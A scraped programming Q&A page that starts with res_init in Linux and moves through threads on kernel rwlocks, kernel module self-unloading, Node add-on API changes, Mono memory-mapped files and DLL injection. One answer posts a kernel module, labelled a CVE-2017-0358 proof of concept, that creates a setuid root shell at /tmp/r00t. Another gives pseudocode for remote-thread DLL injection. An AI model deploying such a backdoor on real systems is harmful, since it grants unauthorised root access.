When should I call res_init in linux? - linux

Pouring over some old network utility code, I found a res_init() call before a getipnodebyname():
void getAddresses(string hostname, set<string> &addresses) {
int error = 0;
res_init();
struct hostent *host = getipnodebyname(hostname.c_str(), AF_INET, AI_DEFAULT, &error);
insertHostAddresses(host, addresses);
freehostent(host);
}
Never having run into this call before, I looked up the man page:
https://linux.die.net/man/3/res_init
However this has not exactly helped me to understand when this call would be necessary to make.
I understand this is for preloading a cache? A bit of an explanation would help me out.
I should note - the current call getaddrinfo does not seem to require this?

One must call res_init() if one intends to modify any of the internal resolver settings before using any of the other resolver(3) functions (directly or indirectly), e.g. to change the flags set in _res.options.

Related

Read/Write lock for linux kernel module

I'm trying to protect my list with data using read/write locks, i found solution in this thread:
What's the best linux kernel locking mechanism for a specific scenario
But i can't find needed headers for this solution, seems it is outdated, error:
error: ‘RW_LOCK_UNLOCKED’ undeclared here (not in a function)
Using <linux/spinlock.h>
RW_LOCK_UNLOCKED has been deprecated for a long time and finally removed in Linux 2.6.39, so now, according to the documentation:
For dynamic initialization, use spin_lock_init() or rwlock_init() as
appropriate:
...
For static initialization, use DEFINE_SPINLOCK() / DEFINE_RWLOCK() or
__SPIN_LOCK_UNLOCKED() / __RW_LOCK_UNLOCKED() as appropriate.
Like
static DEFINE_RWLOCK(myrwlock);
or
rwlock_t myrwlock;
static int __init rwlock_init(void)
{
rwlock_init(&myrwlock);
}
instead of
rwlock_t myrwlock = RW_LOCK_UNLOCKED;

How can a kernel module unload itself without generating errors in kernel log?

I've made a simple module which prints GDT and IDT on loading. After it's done its work, it's no longer needed and can be unloaded. But if it returns a negative number in order to stop loading, insmod will complain, and an error message will be logged in kernel log.
How can a kernel module gracefully unload itself?
As far as I can tell, it is not possible with a stock kernel (you can modify the module loader core as I describe below but that's probably not a good thing to rely on).
Okay, so I've taken a look at the module loading and unloading code (kernel/module.c) as well as several users of the very-suspiciously named module_put_and_exit. It seems as though there is no kernel module which does what you'd like to do. All of them start up kthreads inside the module's context and then kill the kthread upon completion of something (they don't automatically unload the module).
Unfortunately, the function which does the bulk of the module unloading (free_module) is statically defined within kernel/module.c. As far as I can see, there's no exported function which will call free_module from within a module. I feel like there's probably some reason for this (it's very possible that attempting to unload a module from within itself will cause a page fault because the page which contains the module's code needs to be freed). Although this probably could be solved by making a noreturn function which just schedules after preventing the current (invalid) task from being run again (or just running do_exit).
A further point to ask is: are you sure that you want to do this? Why don't you just make a shell script to load and unload the module and call it a day? Auto-unloading modules are probably a bit too close to Skynet for my liking.
EDIT: I've played around with this a bit and have figured out a way to do this if you're okay with modifying the module loader core. Add this function to kernel/module.c, and make the necessary modifications to include/linux/module.h:
/* Removes a module in situ, from within the module itself. */
void __purge_module(struct module *mod) {
free_module(mod);
do_exit(0);
/* We should never be here. */
BUG();
}
EXPORT_SYMBOL(__purge_module);
Calling this with __purge_module(THIS_MODULE) will unload your module and won't cause a page fault (because you don't return to the module's code). However, I would still not recommend doing this. I've done some simple volume testing (I inserted a module using this function ~10000 times to see if there were any resource leaks -- as far as I can see there aren't any).
Oh you can do definitely do it :)
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358#gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
}
void cleanup_module(void) {
return 0;
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}

NodeJS unstable: unable to npm-install modules that need compilation

i've been working with NodeJS 0.11.x distros for some time now, mainly because i believe that generators and the yield statement bring big advances in terms of asynchronous manageability (see coffy-script and suspend).
that said, there's a serious setback when running bleeding-edge, unstable NodeJS installs: when doing npm install xy-module, gyp will fail (always? sometimes?) when trying to compile any C components.
is there a general reason this must be so? is there any trick / patch / configuration i can apply to remedy the situation? if a given module does compile on NodeJS 0.10.x, but fails on 0.11.x, should i expect it to compile on 0.12.x as soon as that becomes available?
Update i cross-posted the issue on the NodeJS mailing list, and ben noordhuis was kind enough to share some details. quoting his message:
The two main changes are as follows:
Persistent<T> no longer derives from Handle<T>. To recreate the
Handle from a Persistent, call Local<T>::New(isolate, persistent).
You can obtain the isolate with Isolate::GetCurrent() (but note that
Isolate::GetCurrent() will probably go away in newer versions of V8.)
The prototype of C++ callbacks and accessors has changed. Before,
your function looked like this:
Handle<Value> MyCallback(const Arguments& args) {
HandleScope handle_scope;
/* Do useful work, then: */
return handle_scope.Close(Integer::New(42));
/* Or: */
return handle_scope.Close(String::New("hello"));
/* Or: */
return Null();
}
In v0.11 and v0.12 that becomes:
void MyCallback(const FunctionCallbackInfo<Value>& args) {
Isolate* isolate = args.GetIsolate();
HandleScope handle_scope(isolate);
/* Do useful work, then: */
args.GetReturnValue().Set(42);
/* Or: */
args.GetReturnValue().Set(String::NewFromUtf8(isolate, "hello"));
/* Or: */
args.GetReturnValue().SetNull();
}
There have been more changes but these two impact every native add-on.
Answered in detail in NodeUp #52: http://nodeup.com/fiftytwo
Summary: major changes in the v8 API, some minor changes in Node, and the changes are still ongoing. But there are two projects that are designed to help with the problem, NAN (github/rvagg/nan) and shim / node-addon-layer (github/tjfontaine/node-addon-layer).

Problems using MemoryMappedFile class on Mono

I'm trying to port a new versio of the Isis2 library from .NET on Windows to Mono/Linux. This new code uses MemoryMappedFile objects, and I suddenly am running into issues with the Mono.Posix.Helper library. I believe that my issues would vanish if I could successfully compile and run the following test program:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO.MemoryMappedFiles;
namespace foobar
{
class Program
{
static int CAPACITY = 100000;
static void Main(string[] args)
{
MemoryMappedFile mmf = MemoryMappedFile.CreateNew("test", CAPACITY);
MemoryMappedViewAccessor mva = mmf.CreateViewAccessor();
for (int n = 0; n < CAPACITY; n++)
{
byte b = (byte)(n & 0xFF);
mva.Write<byte>(n, ref b);
}
}
}
}
... at present, when I try to compile this on Mono I get a bewildering set of linker errors: it seems unable to find libMonoPosixHelper.so, although my LD_LIBRARY_PATH includes the directory containing that file, and then if I manage to get past that stage, I get "System.NotImplementedException: The requested feature is not implemented." at runtime. Yet I've looked at the Mono implementation of the CreateNew method; it seems fully implemented, and the same is true for the CreateViewAccessor method. Thus I have a sense that something is going badly wrong when linking to the Mono libraries.
Does anyone have experience with MemoryMappedFile objects under Mono? I see quite a few questions about this kind of issue here and on other sites, but all seem to be old threads...
OK, I figured at least part of this out by inspection of the Mono code implementing this API. In fact they implemented CreateNew in a way that departs pretty drastically from the .NET API, causing these methods to behave very differently from what you would expect.
For CreateNew, they actually require that the file name you specify be the name of an existing Linux file of size at least as large as the capacity you specify, and also do some other checks for access permissions (of course), exclusive access (which is at odds with sharing...) and to make sure the capacity you requested is > 0. So if you had the file previously open, or someone else does, this will fail -- in contrast to .NET, where you explicitly use memory-mapped files for sharing.
In contrast, CreateOrOpen appears to be "more or less" correctly implemented; switching to this version seems to solve the problem. To get the effect of CreateNew, do a Delete first, wrapping it in a try/catch to catch IOException if the file doesn't exist. Then use File.WriteAllBytes to create a file with your desired content. Then call CreateOrOpen. Now this sounds dumb, but it works. Obviously you can't guarantee atomicity this way (three operations rather than one), but at least you get the desired functionality.
I can live with these restrictions as it works out, but they may surprise others, and are totally different from the .NET API definition for MemoryMappedFile.
As for my linking issues, as far as I can tell there is a situation in which Mono doesn't use the LD_LIBRARY_PATH you specify correctly and hence can't find the .so file or .dll file you used. I'll post more on this if I can precisely pin down the circumstances -- on this one, I've worked around the issue by statically linking to the library.

how to use dll injecting?

i was looking how to inject a dll into a program (exe, or dll, etc). i have been googleing dll injecting but i have not found anything that is very helpful :(. i have not worked with dlls very much so im not sure on what to do, i really could use some help on this.
uhh the only thing i have really found is setwindowshookex but i can't find any examples for it and i don't how to use it. any questions just ask and i'll try to help.
EDIT hey i was googling and this looks like something about dll injecting that is worth looking at but i can't get the code to run :\ (How to hook external process with SetWindowsHookEx and WH_KEYBOARD)
The method I'm most familiar with was is was described by Jefferey Richter in Programming Applications for Microsoft Windows. I mention this because even if you don't get your hands on the book itself there is probably sample code floating around. I think he may have also written some journal articles. He, also mentions a couple of alternative approaches, of which I will describe only one, from memory. He also may have written some MSJ / MSDN articles that are relevant.
Anyway, the basic idea is to cause the process that you want to load your DLL to issue a call to LoadLibrary. This is done using CreateRemoteThread with the address of LoadLibary for lpStartAddress and the address of a string naming your DLL in for lpParameter. Arranging for and locating the string is done using VirtualAllocEx to allocate some memory in the remote process, and WriteProcessMemory to fill it with the string.
PSEUDO CODE:
void InjectDllIntoProcess(DWORD processId, char *dllName)
{
HANDLE hRemoteProcess = OpenProcess(
// Assumes that dll and function addresses are the same in different processes
// on the same system. I think that this is true even with ASLR, only issue I
// can think of is to make sure that the source and target process are both 32
// or both 64 bit, not a mixture.
// Note that it is asking for the ASCII version
HMODULE hDll = LoadLibrary(_T("Kernel32.dll"));
void *loadLibAddr = GetProcAddress(hDll, _T("LoadLibraryA"));
// Inject the DLL name
char * remoteAddr =
(char *)VirtualAllocEx(hRemoteProcess, NULL, strlen(dllName) + 1, ...
WriteProcessMemory(hRemoteProcess, remoteAddr, dllName, strlen(dllName) + 1 ...
CreateRemoteThread(hRemoteProcess, ??, 0, loadLibAddr, remoteAddr, ...
}

Resources